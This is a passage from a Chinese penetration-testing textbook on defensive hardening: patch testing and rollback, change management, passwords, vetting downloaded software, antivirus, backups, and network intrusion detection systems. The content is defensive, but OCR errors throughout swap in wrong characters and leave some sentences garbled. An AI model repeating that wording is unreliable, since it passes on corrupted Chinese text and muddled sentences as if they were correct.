福 社 至 关 重 要 的 问题 。 因 此 ， 他 们 将 分 发 信息 ， 说 明 软 件 包 存 在 问题 ， 而 某 个 更 新 能 够 解 
决 该 问题 。 由 于 此 类 情况 可 能 不 按照 既定 的 日 程 安排 随时 出 现 ， 因 此 组 织 必须 评估 事态 的 
严重 性 ， 并 决定 如 何 才能 最 优 地 应 用 补丁 ， 实 现 其 最 大 效果 。 

令 这 一 过 程 更 加 困难 的 是 ， 无 法 计划 此 类 情况 的 发 生 ; 在 发 现 需 要 立即 解决 的 问题 时 
它们 就 将 发 生 。 对 于 定期 维护 更 新 ， 可 以 将 其 部 署 安 排 在 正 第 业务 操作 不 占用 系统 的 时 段 
进行 。 这 样 ， 如 果 在 修补 过 程 中 出 现 严重 问题 ， 还 来 得 及 处 理 而 不 会 对 业务 操作 产生 不 利 
影响 。 此 类 更 新 和 补丁 程序 可 以 在 周末 或 晚上 的 系统 空闲 时 段 应 用 。 如 果 出 现 问 题 ， 可 以 
在 进度 表 中 设 定时 间 ， 以 留 出 在 再 次 需要 使 用 系统 之 前 解决 问题 的 足够 时 间 。 

如 果 问 题 足够 严重 ， 这 意味 着 更 新 必须 立即 部 署 ， 即 使 系统 正在 工作 中 。 幸 运 的 是 ， 
这 样 的 问题 并 不 第 见 ， 但 是 它们 确实 会 不 时 出 现 ， 必 须 尽 快 地 应 用 补丁 ， 并 以 尽量 降低 由 
于 补丁 部 车 而 使 环境 变 得 不 稳定 的 风险 为 目标 。 


3. 测试 和 验证 补丁 


墨 菲 定律 基本 上 等 于 : 如 果 茶 件 事情 可 能 出 错 ， 那 么 它 一 定 会 出 错 。IT 和 安全 人 员 很 
快 就 认识 到 ， 对 菲 定律 也 适用 于 其 领域 ， 而 且 会 迅速 及 挥 作 用 ， 破 坏 掉 所 有 ( 原 以 为 ) 天 衣 


无 颖 的 计划 。 为 了 避免 可 能 在 部 赣 补 丁 时 出 现 的 问题 ， 最 好 考虑 一 个 强制 性 测试 阶段 。 在 
此 阶段 ， 检 查 以 确保 补丁 按照 宣称 的 方式 工作 ， 并 且 不 会 对 其 部 普 环 境 产 生 任何 不 利 影 
啊 。 不 要 低估 在 部 普 补 丁 时 出 现 问题 的 可 能 性 。 修 补 程序 应 该 解 


决 某 个 问题 并 不 意味 着 将 
它 部 署 到 环境 中 时 不 会 导致 问题 。 补 丁 可 能 会 在 部 署 后 导致 许多 其 他 问题 浮 出 水 面 。 总 有 
可 能 发 生意 想不到 的 问题 ， 这 就 是 为 什么 需要 实施 测试 过 程 ， 目 的 是 尽 可 能 降低 这 种 意外 
情况 的 可 能 性 。 

该 测试 过 程 应 在 获取 补丁 后 ， 将 其 部 署 到 生产 环境 之 前 开始 。 理 想 情况 下 ， 应 将 补丁 
部 署 到 一 个 测试 系统 甚至 实验 室 系统 中 ， 并 在 应 用 补丁 之 前 和 之 后 进行 测试 运行 或 评估 。 
记 住 ， 推 出 了 一 个 修补 程序 ， 并 不 意味 着 必须 部 署 它 ， 在 某 些 情况 下 ， 最 好 的 行动 是 以 不 
变 应 万 变 。 但 是 ， 应 当 在 评估 和 测试 后 做 出 决定 。 另 外 ， 不 要 低估 通过 Google 或 其 他 来 源 
进行 研究 的 价值 ， 看 看 是 否 有 其 他 人 遇 到 该 补丁 或 更 新 的 问题 。 注 意 确保 预备 部 署 的 补丁 
是 从 合法 来 源 获取 ， 并 可 以 进行 校 验 ， 以 确定 它们 没有 任何 方式 的 算 改 或 损坏 。 

完成 补丁 的 测试 和 验证 后 ， 仍 然 还 有 其 他 工作 步骤 需要 完成 。 你 必须 决定 部 署 时 间 
表 。 理 想 情况 下 ， 所 需 的 任何 更 新 ， 即 使 它们 至 关 重 要 ， 也 应 在 正常 营业 时 间 之 外 应 
用 。 在 某 些 情况 下 ， 制 定 计划 时 ， 等 待 不 是 一 个 可 以 考虑 或 计算 得 失 的 选项 。 例 如 ， 曾 
有 这 样 的 情况 ， 其 中 一 个 恶意 软件 (如 蠕虫 ) 在 Internet 上 迅速 蔓延 ， 并 影响 到 世界 各 地 的 
无 数 主机 。 

在 许多 此 类 情况 下 ， 人 们 发 现 ， 使 用 补丁 消除 蠕虫 利用 的 漏洞 ， 不 仅 可 使 系统 本 身 免 
受 感染 ， 而 且 还 具备 消灭 了 一 个 可 用 于 感染 许多 其 他 主机 的 “ 疫 源 ” 主 机 的 效果 。 对 于 此 
类 情况 ， 不 值得 在 应 用 补丁 之 前 作 任 何等 待 。 蠕 虫 仍 在 蔓延 ， 经 过 清理 但 仍然 易 感 的 系统 
仍然 有 着 因 再 次 感染 而 成 为 问题 的 风险 。 

虽然 组 织 不 会 使 用 任何 一 种 固定 方法 应 用 其 更 新 ， 但 在 概念 层面 上 ， 这 些 方法 的 推进 
方式 和 工作 原理 几乎 相同 。 大 多 数 补丁 和 更 新 将 占用 中 等 到 较 高 级 别 的 系统 资源 。 通 常 在 
应 用 补丁 时 ， 系 统 将 需要 重新 启动 (在 某 些 情况 下 ， 多 次 重启 )， 并 且 在 此 期 间 ， 系 统 基本 
上 无 法 用 于 其 正常 用 途 。 这 就 是 为 何 测试 至 关 重 要 ;除了 能 够 测试 补丁 是 否 有 益 并 解决 问 
题 之 外 ， 测 试 使 组 织 能 够 很 好 地 了 解 补丁 过 程 具体 如 何 进行 。 通 过 测试 ， 组 织 可 以 确定 部 
署 补丁 或 更 新 的 最 佳 方式 ， 并 实现 最 少 的 中 断 和 停机 。 

俗话 说 ， 计 划 赶 不 上 变化 快 一 一 环境 越 复杂 ， 情 况 越 严 峻 。IT 界 大 家 都 知道 的 是 ， 尽 
管 之 前 已 经 多 次 安装 了 某 个 软件 或 应 用 了 某 个 补丁 ， 而 没有 发 生 任何 问题 ， 然 后 即使 以 同 
样 的 方式 进行 一 切 操作 ， 还 是 发 生 了 故障 。 为 应 对 此 类 情况 的 发 生 ， 具 备 一 个 回 滚 计划 十 
分 重要 。 有 了 回 滚 计划 ， 当 补丁 或 更 新 未 按 计 划 进 行 ， 并 且 造 成 的 问题 超出 补丁 或 更 新 本 
身 的 价值 时 ， 就 有 了 一 种 以 最 小 的 代价 优雅 地 摆脱 它 的 方式 。 在 某 些 情况 下 ， 这 可 能 意 
味 着 简单 地 卸载 补丁 或 更 新 ， 然 后 重新 启动 系统 ， 就 将 返回 到 问题 发 生 之 前 。 在 其 他 情 
况 下 ， 可 能 必须 重建 系统 (尽管 这 可 能 是 极端 情况 )， 对 于 这 种 情况 ， 但 愿 你 已 事先 进行 计 
划 ， 并 且 准备 可 以 快速 部 署 到 系统 以 使 其 恢复 和 运行 的 系统 映像 。 此 处 应 当 学 到 的 是 ， 应 
当 总 是 准备 一 个 备份 计划 ， 以 备 事情 未 按 预期 发 展 之 需 -一 换 句 话说 ， 抱 最 好 的 希望 ， 做 
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最 坏 的 准备 。 
4. 管理 变更 


在 讨论 补丁 管理 时 必须 解决 的 问题 是 变更 的 问题 。 变 更 管理 是 提供 批准 、 跟 踩 、 更 改 
和 实施 变更 的 机 制 的 过 程 。 出 于 安全 考虑 ， 人 们 总 是 硕 望 能 获得 系统 中 正在 发 生 情 况 的 清 
晰 图 景 ， 并 且 和 希望 能 够 随时 访问 并 复查 该 信息 ， 用 于 满足 审核 或 合 规 性 要 求 。 

在 设计 中 ， 变 更 管理 流程 应 包括 所 有 的 用 于 执行 将 补丁 程序 整合 到 环境 中 的 过 程 的 计 
划 。 这 些 计划 包括 测试 、 部 闭 和 回 深 计 划 ， 以 及 任何 其 他 确保 事情 自始至终 以 清晰 和 记录 
在 案 的 方式 运作 所 需 的 计划 。 在 茶 些 情况 下 ， 变 更 管理 过 程 还 应 包括 有 关 风 险 ， 以 及 给 定 
的 变更 或 更 新 如 何 影响 这 些 风险 的 文档 。 最 后 ， 在 许多 情况 下 ， 还 将 设 定 判 定 变 更 是 否 成 
功 的 预期 基准 。 


5. 安装 和 部 署 补丁 


部 署 是 补丁 管理 过 程 中 管理 员 接 触 最 多 的 阶段 。 部 署 执 行 是 应 用 补丁 和 更 新 系统 的 工 
作 的 环节 。 虽 然 对 组 织 而 言 最 为 “可 见 ” 的 是 该 阶段 ， 但 是 给 定 部 署 和 补丁 管理 程序 总 体 
上 是 否 成 功 是 由 在 整个 补丁 管理 流程 中 所 花费 的 努力 决定 的 。 

6. 审核 和 评估 

定期 审核 和 评估 有 助 于 衡量 补丁 管理 的 持续 成 功 和 适用 范围 。 在 补丁 管理 程序 的 这 个 
阶段 ， 需 要 回答 以 下 问题 : 

@ 需要 修补 哪些 系统 ? 

@ 应 该 更 新 的 系统 是 否 实际 得 到 了 修补 ? 

@ 补丁 管理 中 排除 了 哪些 遗留 系统 ， 以 及 制定 了 何 种 措施 来 抵消 风险 ? 

审核 和 评估 组 件 将 有 助 于 回答 这 些 问 题 ， 但 也 存在 某 些 依赖 性 。 准 确 有 效 的 资产 和 主 
机 管理 是 本 阶段 的 两 个 关键 的 成 功 因素 。 

7. 保证 合 规 性 

虽然 补丁 管理 程序 的 审计 和 评估 要 素 有 助 于 识别 不 合 规 的 系统 ， 但 还 需要 进行 额外 的 
工作 以 消除 不 合 规 主机 。 由 于 接受 评估 的 系统 通常 已 经 部 署 到 生产 中 ， 因 此 进行 的 审核 和 
评估 工作 可 以 视 为 “事后 ”的 合 规 性 评估 。 为 了 对 上 述 实施 后 评估 进行 补充 ， 应 使 用 相关 
控制 项 ， 以 确保 新 部 署 和 重建 的 系统 在 相应 的 补丁 级 别 上 满足 合 规 性 指标 要 求 。 


16.5.2 增强 密码 


密码 是 阻止 未 授权 用 户 访 问 系 统 的 主要 方法 之 一 。 密 码 与 房屋 或 汽车 的 钥匙 非常 相 
似 ， 只 允许 具有 正确 钥 古 的 人 进入 汽车 或 房屋 。 密 码 具 有 仅 允 许 授 权 用 户 访问 系统 或 服务 
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的 重要 目的 。 密 码 最 大 的 问题 之 一 是 它们 经 第 被 无 效 化 ， 原 因 是 用 户 的 粗心 大 意 或 鲁莽 
(这 是 两 种 本 节 中 通过 正确 使 用 密码 解决 的 问题 )。 
有 关 创 建 更 好 更 强 密码 的 指导 ， 请 参阅 第 8 章 “ 破 解密 码 ”。 


16.5.3 “谨慎 安 委 软件 


软件 是 使 用 计算 机 执行 任何 工作 时 所 需 使 用 的 工具 。 软 件 包 括 所 有 的 应 用 程序 、 服 务 
和 操作 系统 本 身 ， 所 以 即使 是 最 基本 的 系统 中 也 有 很 多 软件 在 运行 。 问 题 在 于 ， 软 件 会 不 
折 不 扣 地 执行 其 设计 者 的 意图 ， 这 意味 着 它 可 能 会 造成 伤害 。 考 虑 到 这 一 点 ， 必 须 仔 细 考 
虑 下 载 的 应 用 程序 有 无 问题 ， 及 其 在 计算 机 上 可 能 进行 何 种 操作 。 

在 讨论 软件 时 ， 请 考虑 一 个 软件 应 用 程序 可 能 进行 的 操作 。 考 虑 用 户 可 以 执行 的 任何 
操作 一 一 包括 删除 文件 、 更 改 系统 配置 、 务 载 应 用 程序 或 禁用 功能 一 一 应 用 程序 也 可 以 执 
行 这 些 操 作 。 请 记 住 ， 你 下 载 的 内 容 可 能 并 不 会 顾及 你 的 最 大 利益 。 

应 考虑 某 些 应 用 程序 下 载 后 ， 可 能 完全 不 包括 任何 文档 ， 或 是 说 明 其 全 部 行为 的 概略 
指南 ， 你 只 能 上 自己 保护 自己 。 更 糟糕 的 是 ， 当 你 需要 帮助 时 ， 软 件 甚 至 可 能 没有 可 以 联系 
的 作者 。 可 能 只 能 由 你 自己 决定 该 应 用 程序 是 否 能 够 帮助 你 ， 或 者 是 一 个 从 事 某 种 险恶 勾 
当 的 工具 。 

通过 应 用 以 下 准则 ， 可 以 避免 与 不 受信 任 或 未 知 软件 相关 的 一 些 问题 : 

在 购买 软件 之 前 ， 应 尽 可 能 多 地 了 解 产品 及 其 功能 。 

在 购买 之 前 了 解 退 款 / 退 货 政策 。 

从 已 经 熟悉 的 本 地 商店 或 具有 良好 声誉 的 全 国 连锁 店 购买 。 

如 果 要 下 载 某 个 软件 ， 请 从 信誉 良好 的 来 源 获取 。 
切 勿 在 安全 系统 上 安装 不 受信 任 的 软件 ， 如 果 确 实 需要 安装 ， 请 首先 在 隔离 测试 
系统 中 测试 它 的 行为 。 

@ 使 用 防 病毒 和 反 间 谍 软 件 应 用 程序 扫描 所 有 下 载 的 内 容 。 

@ 确保 文件 的 哈 希 值 与 供应 商 发 布 的 值 匹配 ， 以 确保 软件 的 完整 性 。 

@ 不 要 从 BitTorrent 等 文件 共享 系统 下 载 软件 。 

请 注意 上 面 的 列表 中 存在 下 载 的 应 用 程序 。 目 前 ， 你 使 用 的 许多 应 用 程序 只 以 数字 格 
式 在 线 提供 。 所 有 类 型 的 系统 都 有 大 量 的 免费 程序 可 用 ， 并 且 数 量 与 日 俱 增 。 挑 战 在 于 判 
断 哪些 程序 值得 信任 ， 因 此 值得 冒险 在 家 用 计算 机 上 安装 和 运行 。 

所 以 在 有 大 量 的 软件 只 能 下 载 获得 的 前 提 下 ， 如 何 做 才 是 安全 的 ? 可 考虑 下 列 指导 

@ 该 程序 是 做 什么 的 ? 应 能 读 到 一 份 程序 功能 的 清晰 说 明 。 该 描述 可 能 在 下 载 它 的 

网 站 上 ， 或 在 用 于 安装 它 的 CD 上 。 需 要 认识 到 ， 如 果 程 序 编写 具备 恶意 目的 ， 
那么 其 作者 /入 侵 者 就 不 会 告知 你 ， 该 程序 会 损害 你 的 系统 。 他 们 可 能 会 试图 误导 
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你 。 所 以 ， 可 以 尽量 获取 信息 ， 但 要 考虑 信息 来 源 ， 并 考虑 是 否 信任 这 些 信息 。 

@ 安装 和 运行 程序 时 ， 将 同系 统 安装 哪些 文件 ? 还 有 何其 他 更 改 ? 再 次 强调 ， 为 了 
进行 该 测试 ， 可 能 不 得 不 询问 作者 /入 侵 者 ， 其 程序 如 何 修 改 你 的 系统 。 要 考虑 来 
源 可 信和 度 。 

@ 是 否 可 以 使 用 电子 邮件 、 电 话 、 信 件 或 其 他 方式 联系 软件 开发 者 ? 获取 此 信息 
后 ， 请 使 用 其 尝试 与 作者 联系 ， 以 验证 联系 信息 是 否 有 效 。 与 软件 开发 者 的 互动 
可 能 会 提供 有 关 该 程序 及 其 对 计算 机 和 你 的 可 能 影响 的 更 多 相关 线索 。 

@ 有 没有 其 他 人 曾 使 用 过 这 个 程序 ， 你 可 以 从 他 或 她 那里 了 解 到 什么 信息 ? 使 用 网 
络 浏览 句 符 试 进行 一 些 Intermet 搜 索 。 有 人 可 能 在 你 之 前 使 用 过 这 个 程序 ， 因 此 在 
安装 之 前 尽量 学 习 。 

如 果 无 法 对 这 些 问题 给 出 确定 的 判断 ， 那 么 应 当 认 真 考虑 是 否 值得 冒险 。 只 有 你 上 自己 
能 决定 哪个 才 是 最 好 选择 。 无 论 准备 做 什么 ， 准 备 好 从 头 开 始 构建 计算 机 ， 以 免 程序 出 现 
问题 并 破坏 系统 。 

请 记 住 ， 防 病毒 程序 可 以 防止 下 载 和 安装 程序 导致 的 一 些 问 题 。 但 是 ， 还 应 记 住 ， 
识别 出 一 个 病毒 与 计算 机 知晓 该 问题 之 间 存 在 一 定 延 时 。 即 使 刚刚 下 载 的 程序 不 包含 病 
毒 ， 也 可 能 会 出 现 意 外 的 情况 。 在 下 载 、 安 装 和 运行 新 程序 时 ， 应 该 持续 保持 谨慎 并 做 
足 功 课 。 


16.5.4 ”使 用 防 病毒 软件 包 


病毒 和 蠕虫 形式 的 恶意 软件 是 现代 具备 网 络 和 共享 媒体 的 计算 搁 术 的 危险 之 一 。 虽 
然 一 些 系统 比 其 他 系统 更 易 被 感染 ， 但 所 有 系统 都 会 被 感染 ， 无 论 它们 是 基于 Windows、 
Mac 还 是 Linux。 每 种 系统 都 有 针对 的 恶意 软件 ， 只 是 数量 多 少 的 问题 。 茶 些 病 毒 只 是 令 
人 烦恼 ， 其 他 的 病毒 可 能 会 对 计算 机 造成 严重 的 损害 ， 甚 至 可 能 会 损坏 数据 到 无 法 修复 或 
恢复 的 地 步 。 为 了 保护 系统 免 受 病毒 侵害 ， 可 采用 数 个 简单 的 必要 的 步骤 ， 其 中 最 优先 的 
是 安装 和 维护 。 必 须 将 保护 系统 免 受 病毒 侵害 视 为 一 种 全 职工 作 : 计算 机 永远 不 可 能 真正 
安全 ， 除 非 它 与 Internet 断 开 连 接 ， 并 且 不 会 癌 其 中 捅 入 来 目 不 可 靠 来 源 的 计算 机 厂 盘 
或 软件 。 


16.6 ”备份 系统 


计算 机 上 的 所 有 内 容 通 常 可 被 分 为 可 蔡 代 的 项 目 和 不 可 苦 代 的 项 目 。 你 对 使 用 的 计算 
机 上 无 法 蔡 代 的 项 目 ， 如 项 目 文件 、 照 片 、 应 用 程序 和 财务 报表 作 了 何 种 保护 措施 ? 如 
果 你 的 计算 机 故障 ， 或 被 一 个 成 功 的 攻击 者 破坏 会 发 生 什 么 ? 那些 文件 是 否 会 就 此 永远 


消失 ? 
当 因 故障 或 入 侵 者 造成 损失 时 ， 你 是 否 有 备份 或 其 他 恢复 信息 的 方法 ? 是 否 将 文件 备 
份 到 其 他 媒体 上 ， 以 便 可 在 需要 时 恢复 文件 ? 


在 决定 应 进行 哪些 操作 以 备份 计算 机 上 的 文件 时 ， 请 上 自问 下 列 问题 : 
@ 应 当 备 份 什么 文件 ?应 选择 那些 无 法 轻易 地 重新 创建 或 从 其 他 来 源 ， 例 如 计算 机 
附带 的 CD 或 软盘 重新 安装 的 文件 。 
@ 打印 出 的 文 票 注册 表 不 构成 一 个 备份 ， 因 为 使 用 备份 应 当 能 够 简单 地 重新 创建 文 
票 账 己 程序 所 需 的 文件 。 如 果 文 件 被 破坏 ， 可 能 不 需要 重新 输入 所 有 数据 。 正 如 
保护 不 可 蔡 代 的 贵重 物品 一 样 ， 备 份 那些 无 法 轻易 地 或 以 其 他 方式 蔡 代 的 文件 。 
@ 应 当 多 久 备份 一 次 ? 在 理想 的 情况 下 ， 应 该 在 每 次 更 改 某 个 文件 时 备份 一 次 。 如 
果 没 有 ， 将 不 得 不 重复 自 上 次 备份 以 来 对 该 文件 作 的 所 有 更 改 。 正 如 将 珍 贯 的 首 
饰 存放 在 本 地 银行 的 保险 箱 中 一 样 ， 需 要 在 每 次 使 用 (文件 更 改 ) 后 安全 地 存储 文件 
(备份 )， 以 防 入 侵 者 破坏 文件 或 出 现 系统 灾难 。 
@ 应 该 备份 到 何 处 ， 即 应 该 使 用 何 种 介质 存储 备份 的 文件 ? 答案 是 : 有 什么 用 什 
么 。 这 是 一 个 权衡 需要 使 用 的 介质 数量 以 及 使 用 的 方便 性 的 问题 。 更 大 容量 的 可 
移动 磁盘 驱动 器 和 可 写 CD 以 及 外 置 硬盘 驱动 器 都 可 以 正 稼 使用， 并 且 人 花费 的 时 间 
更 少 。 
@ 在 介质 中 存储 了 备份 文件 后 ， 应 该 在 哪里 存储 该 介质 ? 无 论 如 何 备份 文件 ， 都 需 
要 关心 这 些 备份 副本 的 存放 位 置 ， 其 中 包括 可 能 的 存储 位 置 ， 如 云 。 
蝇 盗 可 以 通过 和 镭 取 备 份 获取 相同 的 信息 。 但 是 ， 相 比 于 可 以 从 (字面 上 的 ) 世 界 上 任何 
地 方 访问 你 的 家 用 计算 机 的 入 侵 者 ， 由 于 强盗 必须 知道 备份 的 存放 位 置 ， 所 以 更 难 。 关 键 
在 于 知道 包含 备份 文件 的 介质 的 存放 位 置 。 

这 意味 着 应 该 始终 在 防火 容器 中 ， 或 其 他 可 防止 损坏 的 场所 ， 保 留 所 有 备份 的 文件 的 
一 份 副 本 。 


16.7 “本 癌 小 结 


保护 网 络 主机 免 受 攻击 是 系统 所 有 者 和 安全 专业 人 员 ( 如 渗透 测试 者 ) 的 一 项 基本 责 
任 。 应 用 诸如 管理 应 用 程序 的 安装 ， 应 用 补丁 和 更 新 ， 以 及 使 用 强 密 码 等 技能 ， 是 有 效 的 
防御 入 侵 的 措施 。 

加 固 是 描述 用 于 保护 系统 ， 防 止 出 现 漏洞 引发 的 问题 的 流程 的 术语 。 该 流程 包括 各 种 
评估 ， 重 新 评估 和 必要 的 补救 措施 等 多 个 阶段 。 该 流程 可 以 按照 由 外 加 内 的 方法 进行 ， 其 
中 从 系统 内 部 或 者 环境 的 外 部 周 界 进行 加 固 ， 或 者 在 需要 时 ， 以 相反 的 顺序 进行 。 在 其 他 
情况 下 ， 将 使 用 这 两 种 方法 ， 以 全 面 了 解 网 络 和 企业 环境 的 安全 状况 。 


16.8 “习题 


1. 何谓 加 固 ? 

2. 加 固有 何 好 人 处? 

3. 所 有 系统 是 否 都 以 相同 的 方式 进行 加 固 ? 
4. 补丁 对 于 加 固有 何 重要 意义 ? 

5. 何谓 漏洞 ? 
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在 前 文中 ， 本 书 已 介绍 过 网 络 和 应 用 程序 层次 的 攻击 ,但 这 只 是 渗透 测试 工作 的 一 部 
分 。 一 名 渗透 测试 者 不 仅 要 了 解 系统 特点 以 及 如 何 临 场 发 挥 ， 找 到 识别 违反 安全 性 的 弱点 
的 途径 ; 他 们 还 必须 知道 如 何 解 决 所 发 现 的 问题 ， 并 为 客户 推荐 修复 方案 。 


本 章 将 学 习 : 
如 ”网络 加 固 的 定义 
如 ”为何 要 进行 网 络 加 固 
名 了 解 加 固 系 统 的 默认 状态 


17.1 网络 加 固 人 简介 


在 上 一 章 中 ， 本 书 从 网 络 上 的 个 人 主机 和 设备 的 角度 讨论 了 安全 加 固 ， 但 并 未 介绍 
如 何 加 固 网 络 和 服务 。 与 主机 一 样 ， 必 须 对 网 络 进行 评估 ， 以 确定 当前 网 络 中 何 处 易 受 攻 
击 ， 漏 洞 类 型 及 其 严重 性 ， 每 个 漏洞 所 在 的 位 置 以 及 它们 的 相互 关联 。 该 过 程 的 最 终结 果 
应 该 是 : 网 络 更 具 弹 性 ， 能 够 抵抗 攻击 或 破坏 ， 从 而 提升 安全 状况 。 

由 于 网 络 加 固 所 具备 的 复杂 性 、 上 覆盖 面 、 多 样 化 的 服务 和 潜在 用 户 数量 ， 这 项 工作 
将 更 为 艰巨 而 富 于 挑战 ， 但 绝对 具备 可 行 性 。 与 任何 这 种 广度 和 规模 的 工作 一 样 ， 需 要 仔 
细 规 划 才 能 获得 最 佳 效 果 。 事 实 上 ， 如 果 一 直 以 同样 的 小 心 辟 辟 、 深 思 熟 谍 的 态度 进行 工 
作 ， 那 么 应 该 已 通过 渗透 测试 得 到 全 面 的 文件 记录 和 结果 ， 只 需要 在 此 基础 上 进行 一 些 研 
究 ， 伦 一 些 时 间 找 出 处 理 渗透 测试 所 发 现 问 题 的 最 佳 方案 ， 然 后 加 客户 提出 这 些 建议 。 

那么 ， 基 于 现 已 掌握 的 加 固 主机 流程 的 相关 知识 ， 接 下 来 将 讨论 如 何 保护 网 络 ， 以 及 
可 以 用 于 实现 该 目标 的 各 种 事项 、 任 务 和 设备 。 


何谓 网 络 加 固 


当 进行 网 络 加 固 的 过 程 时 ， 和 加 固 主机 一 样 ， 可 能 涉及 技术 、 管 理 和 物理 措施 ， 以 形 
成 一 个 最 终 的 安全 解决 方案 。 重 要 的 是 要 清楚 ， 无 论 是 技术 、 管 理 还 是 物理 控制 项 ， 都 没 
有 一 个 方面 或 一 个 组 件 可 以 单打 独 斗 ， 需 要 将 它们 组 合 使 用 ， 以 得 到 最 佳 的 效 费 比 。 


@ 技术 控制 项 ， 即 以 技术 为 基础 的 任何 事物 ， 如 服务 器 、 认 证 系统 ， 甚 至 防火 场 等 。 

@ 管理 控制 项 ， 即 一 系列 规定 如 何 加 固 环 境 ， 以 及 在 该 环境 中 如 何 做 出 反应 的 策略 
和 流程 。 

@ 物理 控制 项 ， 即 任何 用 于 保护 网 络 上 的 组 件 或 区 域 ， 在 物理 上 不 被 任何 未 经 授权 
的 人 员 访 问 和 触动 的 措施 。 

本 章 中 将 主要 关注 技术 控制 项 。 

接 下 来 就 将 讨论 尝试 加 固 和 防御 网 络 时 会 遇 到 的 一 些 问题 。 


17.2 入侵 检测 系统 


如 前 所 述 ， 入 侵 检测 系统 (IDS) 是 一 个 防盗 报警 器 ， 它 提供 了 攻击 或 其 他 可 疑 活 动 的 
一 些 最 初 迹象 。 虽 然 它 们 无 法 阻止 活动 的 发 生 ， 但 能 够 提供 通知 。 请 记 住 ， 这 些 设 备 定位 
于 监视 网 络 或 主机 。 虽 然 来 和 目 入 侵 检 测 系 统 的 许多 通知 信息 可 能 是 无 害 的 ， 但 是 对 于 可 能 
的 滥用 或 攻击 的 检测 和 啊 应 ， 必 须 能 够 基于 其 提供 的 警报 进行 啊 应 。 

IDS 是 一 种 可 以 采取 两 种 不 同形 式 之 一 的 保护 措施 : 它 可 以 是 软件 版 本 ， 即 一 个 可 按 
消费 者 需求 配置 的 应 用 程序 ， 也 可 以 是 硬件 版 本 ， 即 一 台 物 理 设备 ， 通 第 性 能 更 高 。 两 
者 都 是 监控 系统 的 有 效 方式 。 后 者 是 一 个 收集 和 分 析 计 算 机 、 网 络 或 设备 生成 的 信息 的 
设备 。 

基于 网 络 的 入 侵 检 测 系统 (Network-Based Intrusion Detection System ，NIDS) 是 一 种 符 
合 此 类 别 的 IDS。 它 可 以 检测 网 络 上 的 可 疑 活动 ， 例 如 误 用 、SYN 洪 泛 、MAC 洪 泛 或 其 他 
类 似 的 行为 ， 并 且 最 适合 于 部 闭 到 网 络 中 。 

NIDS 能 够 检测 大 量 不 同 的 具备 可 疑 和 恶意 特征 的 活动 ， 因 此 是 监控 网 络 的 绝 佳 选 
择 。 它 可 以 检测 以 下 内 容 : 

对 计算 机 上 可 用 服务 的 反复 探测 

来 自 异 常 位 置 的 连接 

来 自 远程 主机 的 反复 登录 尝试 

日 志文 件 中 ， 任 何 提 示 和 尝试 进行 拒绝 服务 或 服务 宕 机 的 数据 
流量 模式 的 变化 

使 用 异常 协议 

应 用 层 流量 


17.2.1 1IDS 原 理 综述 


入 侵 检测 过 程 是 将 几 个 过 程 中 收集 的 信息 进行 综合 分 析 的 过 程 。 该 过 程 设计 用 于 啊 应 
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响 探 的 数据 包 ， 然 后 进行 分 析 。 在 下 面 的 例子 中 ， 从 运行 网 络 传 感 硕 的 主机 或 设备 的 网 络 
中 吊 探 信息 ， 对 本 地 网 段 的 数据 包 进 行 噢 探 并 分 析 。 

(1) 主机 创建 一 个 网 络 数据 包 。 

(2) 传感器 在 网 段 上 咒 探 得 到 该 数据 包 。 

G)IDS 和 传感器 将 数据 包 与 已 知 的 误 用 签名 进行 匹配 。 

(4) 命令 控制 全 接收 并 显示 和 警报， 通知 安全 管理 员 或 系统 所 有 者 发 生 入 侵 。 

(5) 按照 系统 所 有 者 的 期 望 ， 对 啊 应 作出 调整 ， 以 应 对 事件 。 

(6) 记录 和 警报 以 供 将 来 分 析 和 参考 。 

(7) 创建 一 个 详细 事件 报告 。 

(8) 将 警报 与 其 他 数据 进行 比较 ， 以 确定 是 个 存 在 茶 种 攻击 模式 ， 或 者 提示 菏 种 扩展 
攻击 的 信息 。 


17.2.2 HIDS 的 组 件 


基于 主机 的 IDSGHIDS) 是 在 大 型 网 络 环境 中 出 现 的 另 一 种 类 型 的 IDS， 它 仅 负责 监视 
单个 系统 上 的 多 种 不 同类 型 的 活动 ， 而 不 监视 网 络 活动 。 基 于 主机 的 IDS 可 能 因 其 到 底 应 
该 具有 何 种 功能 而 令 人 感到 困惑 。 有 很 多 供应 商 提供 多 种 不 同类 型 的 HDS， 而 且 它 们 已 
经 有 了 很 长 的 发 展 历史 ， 因 而 相互 之 间 功 能 集 差 别 很 大 。 

和 基于 网 络 的 IDS 类 似 ， 基 于 主机 的 IDS 也 有 一 个 命令 控制 台 ， 所 有 的 监视 和 管理 均 
在 其 中 进行 。 这 部 分 软件 是 用 于 按 需 更 改 和 更 新 系统 的 组 件 。 该 管理 端 可 以 置 于 另 一 台 计 
算 机 上 ， 管 理 员 可 以 通过 定制 的 软件 或 者 Web 浏 览 器 访问 管理 端 。 在 某 些 情况 下 ， 管 理 控 
制 台 只 能 从 本 地 访问 ， 此 时 管理 员 就 必须 进行 现场 管理 ， 或 者 另 寻 一 种 远程 管理 方式 。 

HIDS 中 的 第 二 个 组 件 被 称 为 代理 。 类 似 于 网 络 传感器 ， 代 理 负 责 监 控 和 报告 系统 中 
发 生 的 任何 异常 或 可 疑 的 活动 。 代 理 将 部 署 到 目标 系统 ， 并 监视 系统 中 的 权限 使 用 情况 、 
系统 设置 更 改 、 文 件 修 改 以 及 其 他 可 疑 活动 。 


17.2.3 1IDS 的 局 限 性 


IDS 能 够 监控 网 络 的 情况 ， 并 告知 系统 管理 员 ， 但 它 确实 有 其 局 限 性 ， 不 适用 于 某 些 
场合 。 为 了 确保 使 用 这 些 系统 时 能 够 得 到 最 大 的 投资 回报 ， 应 在 了 解 IDS 优 势 的 同时 ， 了 
解 其 局 限 性 。 

当 你 发 现 客户 环境 中 的 问题 ， 并 决定 防护 策略 将 包含 一 个 或 多 个 IDS 时 ， 请 考虑 尝试 
达到 的 监控 目标 。 记 住 ， 即 使 IDS 是 一 种 很 好 的 系统 ， 可 以 帮助 严格 管理 、 加 固 网 络 ， 但 
错误 的 IDS 应 用 方式 可 能 会 提供 一 种 虚假 的 安全 感 一 一 你 可 能 会 认为 它们 已 各 司 其 职 (就 能 
很 好 地 保护 系统 安全 )， 但 实际 上 它们 并 没有 能 力 完成 所 需 的 防护 任务 。 例 如 ， 网 络 IDS 能 
够 很 好 地 检测 网 络 上 的 流量 和 恶意 活动 ， 但 是 如 果 尝 试 使 用 它 监视 单个 主机 上 的 文件 更 


改 或 系统 配置 设置 等 活动 时 ， 则 难 做 到 。 也 有 可 能 ，IDS 可 能 会 通报 它 感 知 存 在 的 问题 ， 
